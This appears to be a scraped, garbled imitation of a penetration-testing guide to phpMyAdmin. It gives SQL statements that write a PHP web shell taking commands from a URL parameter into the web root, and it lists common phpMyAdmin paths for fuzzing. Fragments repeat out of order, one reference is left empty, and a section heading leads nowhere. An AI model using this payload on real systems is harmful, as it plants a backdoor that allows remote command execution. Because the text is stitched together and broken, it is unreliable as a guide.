Phpmyadmin | Hacktricks

If your authenticated DB user has administrative privileges (like root ), you can attempt to write files directly to the web directory.

Following the tactical spirit of , this comprehensive guide details the precise methodologies used during penetration tests to discover, exploit, and secure phpMyAdmin instances. 1. Information Gathering and Endpoint Discovery phpmyadmin hacktricks

CREATE DATABASE temp; USE temp; CREATE TABLE shell (data TEXT); INSERT INTO shell VALUES ('<?php system($_GET["cmd"]); ?>'); SELECT data INTO OUTFILE '/var/www/html/shell.php' FROM shell; If your authenticated DB user has administrative privileges

Administrators often leave phpMyAdmin on predictable directories. Security professionals use fuzzing tools like gobuster , dirsearch , or ffuf to scan for common endpoints: /phpmyadmin/ /pma/ /admin/pma/ /mysql/ /phpMyAdmin/ /dbadmin/ Version Fingerprinting CREATE TABLE shell (data TEXT)